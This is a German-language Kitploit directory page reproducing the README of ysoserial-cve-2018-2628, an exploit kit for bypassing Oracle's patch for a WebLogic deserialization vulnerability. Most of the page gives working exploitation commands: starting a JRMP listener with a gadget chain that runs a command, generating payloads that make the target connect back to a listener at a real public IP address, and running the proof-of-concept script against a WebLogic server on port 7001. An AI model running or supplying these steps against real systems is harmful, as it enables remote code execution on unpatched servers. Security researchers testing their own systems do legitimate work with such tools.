Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ysoserial-cve-2018-2628 — Einige Codes zur Umgehung des Oracle WebLogic CVE-2018-2628 Patches | Kitploit
Tools/GitHubGitHub/tdy218/ysoserial-cve-2018-2628
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubtdy218/ysoserial-cve-2018-2628

ysoserial-cve-2018-2628

Einige Codes zur Umgehung des Oracle WebLogic CVE-2018-2628 Patches

Repository anzeigen
114483vor 8 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ysoserial-cve-2018-2628

0x1. Vorbereitung

  • Bereiten Sie die erforderliche Softwareumgebung für das POC-Skript, die Payload-Objekterstellung und den JRMPListener vor
    Python 2.7.x
    Oracle Java SE 1.7+
  • Bereiten Sie eine WebLogic Server 10.3.6-Umgebung vor, die mit dem Patch Set Update 180417 installiert ist (nur AdminServer reicht)
    Falls bereits eine WebLogic-Umgebung mit dieser PSU-Version vorhanden ist, kann dieser Schritt übersprungen werden.
  • Bereiten Sie die POC-Tools vor
    Laden Sie das POC-Skript (wls-cve-2018-2628-poc.py) von diesem Projekt herunter
    Laden Sie die Jar-Datei (ysoserial--cve-2018-2628-all.jar) für die Payload-Objekterstellung und das JRMPListener-Programm von der Release-Seite dieses Projekts herunter

0x2. JRMPListener ausführen

Befehlsformat:

java -cp ysoserial--cve-2018-2628-all.jar ysoserial.exploit.JRMPListener

Zum Beispiel:

java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 22801 Jdk7u21 "calc.exe"

Wenn die Ausgabe *Opening JRMP listener on 22801 erscheint, notieren Sie die IP-Adresse des Hosts, auf dem der JRMPListener läuft (im Beispiel läuft er auf einer Alibaba-Cloud-ECS-Instanz mit der öffentlichen IP 47.94.158.125) und den angegebenen Port.

0x3. Basierend auf der IP-Adresse und dem Listening-Port des JRMPListener aus dem vorherigen Schritt, generieren Sie den Payload-String

Derzeit sind zwei Methoden bekannt (wählen Sie eine der beiden folgenden Methoden zum Generieren des Payload-Objekt-Strings):

  • Verwendung von java.rmi.activation.Activator [CVE-2017-3248]

Befehlsformat zum Generieren des Payload-Objekt-Strings:

java -jar ysoserial--cve-2018-2628-all.jar JRMPClient2 : | xxd -p | tr -d $'\n' && echo

Zum Beispiel:

java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 47.94.158.125:22801 | xxd -p | tr -d $'\n' && echo

Beispiel (Binärausgabedaten des mit JRMPClient2 generierten Payload-Objekts):

  • Verwendung von weblogic.jms.common.StreamMessageImpl zur Kapselung von java.rmi.registry.Registry

Befehlsformat zum Generieren des Payload-Objekt-Strings:

java -jar ysoserial--cve-2018-2628-all.jar JRMPClient3 : | xxd -p | tr -d $'\n' && echo

Zum Beispiel:

java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient3 47.94.158.125:22801 | xxd -p | tr -d $'\n' && echo

Beispiel (Binärausgabedaten des mit JRMPClient3 generierten Payload-Objekts):

0x4. Bearbeiten und Ausführen des POC-Skripts

Bearbeiten Sie wls-cve-2018-2628-poc.py. Ersetzen Sie den Wert der Variablen payload_str oben im Skript durch den im vorherigen Schritt generierten Hex-String (die beiden in diesem Skript enthaltenen payload_str-Werte können ebenfalls direkt verwendet werden, sie entsprechen den Hex-Strings der beiden oben genannten Methoden).

Befehlsformat:

python wls-cve-2018-2628-poc.py

Zum Beispiel:

python wls-cve-2018-2628-poc.py 192.168.64.83 7001

Beispiel (mit installiertem Patch Set Update 180417):

0x5. Danksagungen

xxlegend@nsfocus (einer der Entdecker und Einreicher der Schwachstelle CVE-2018-2628, der den Ausnutzungsweg und relevante Codebeispiele offenlegte)
badcode@knownsec (bereitstellte das Codebeispiel zur Kapselung von java.rmi.registry.Registry durch weblogic.jms.common.StreamMessageImpl)
ysoserial project (fasst viele Java-Deserialisierungs-Exploits zusammen)

Tool herunterladen